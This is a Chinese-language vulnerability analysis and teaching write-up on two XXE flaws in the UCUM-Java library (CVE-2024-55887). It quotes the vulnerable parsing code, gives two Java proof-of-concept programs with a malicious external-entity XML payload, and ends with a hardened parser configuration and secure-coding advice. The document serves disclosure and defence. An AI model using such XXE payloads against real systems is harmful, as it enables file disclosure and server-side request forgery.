Ucum-java XXE漏洞分析(CVE-2024-55887)
字数 1205 2025-08-22 12:22:42
UCUM-Java XXE漏洞分析(CVE-2024-55887) 教学文档
漏洞概述
本文档详细分析UCUM-Java库中的两个XXE(XML External Entity)漏洞,分别存在于UcumEssenceService和XmlUtils类中。这两个漏洞均由于未对XML外部实体进行适当限制而导致。
漏洞详情
1. UcumEssenceService XXE漏洞
漏洞位置:UcumEssenceService类的构造函数
漏洞代码:
public UcumEssenceService(InputStream stream) throws UcumException {
super();
assert stream != null : paramError("factory", "stream", "must not be null");
try {
model = DefinitionsProviderFactory.getProvider().parse(stream);
} catch (Exception e) {
throw new UcumException(e);
}
}
漏洞分析:
- 构造函数直接接收
InputStream参数并传递给DefinitionsProviderFactory.getProvider().parse()方法 - 未对XML解析过程进行任何安全配置,允许外部实体解析
- 攻击者可构造恶意XML文件,通过外部实体引用读取系统敏感文件或发起SSRF攻击
漏洞验证POC:
public class Main {
public static void main(String[] args) throws UcumException {
String maliciousXml = "<?xml version = \"1.0\" encoding = \"utf-8\"?>\n" +
"<!DOCTYPE test [\n" +
" <!ENTITY file SYSTEM \"http://127.0.0.1:8000/xxe\">\n" +
"]>\n" +
"<author>&file;</author>";
InputStream inputStream = new ByteArrayInputStream(maliciousXml.getBytes());
UcumEssenceService ucumEssenceService = new UcumEssenceService(inputStream);
System.out.println("Hello, World!");
}
}
2. XmlUtils XXE漏洞
漏洞位置:XmlUtils类的parseDOM静态方法
漏洞代码:
public static Document parseDOM(InputStream stream) throws ParserConfigurationException, SAXException, IOException {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(false);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(stream);
return doc;
}
漏洞分析:
- 使用默认配置的
DocumentBuilderFactory创建XML解析器 - 未禁用外部实体解析(DTDs和外部实体)
- 攻击者可利用此方法解析恶意XML文件,导致信息泄露或服务器端请求伪造(SSRF)
漏洞验证POC:
public class Main {
public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
String maliciousXml = "<?xml version = \"1.0\" encoding = \"utf-8\"?>\n" +
"<!DOCTYPE test [\n" +
" <!ENTITY file SYSTEM \"http://127.0.0.1:8000/xxe\">\n" +
"]>\n" +
"<author>&file;</author>";
InputStream inputStream = new ByteArrayInputStream(maliciousXml.getBytes());
Document doc = XmlUtils.parseDOM(inputStream);
}
}
漏洞修复方案
1. UcumEssenceService修复方案
应在DefinitionsProviderFactory.getProvider().parse()方法内部实现安全配置,或在使用前对输入流进行安全处理。
2. XmlUtils修复方案
修改parseDOM方法,添加安全配置:
public static Document parseDOM(InputStream stream) throws ParserConfigurationException, SAXException, IOException {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// 禁用外部实体
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
factory.setNamespaceAware(false);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(stream);
return doc;
}
安全编码建议
- 禁用DOCTYPE声明:设置
http://apache.org/xml/features/disallow-doctype-decl为true - 禁用外部实体:
- 设置
http://xml.org/sax/features/external-general-entities为false - 设置
http://xml.org/sax/features/external-parameter-entities为false
- 设置
- 禁用外部DTD:设置
http://apache.org/xml/features/nonvalidating/load-external-dtd为false - 禁用XInclude:
setXIncludeAware(false) - 禁用实体引用扩展:
setExpandEntityReferences(false)
总结
这两个XXE漏洞都是由于未对XML解析器进行安全配置导致的。在Java中处理XML时,必须显式禁用外部实体解析功能,以防止XXE攻击。开发者应遵循最小权限原则,仅启用必要的XML功能。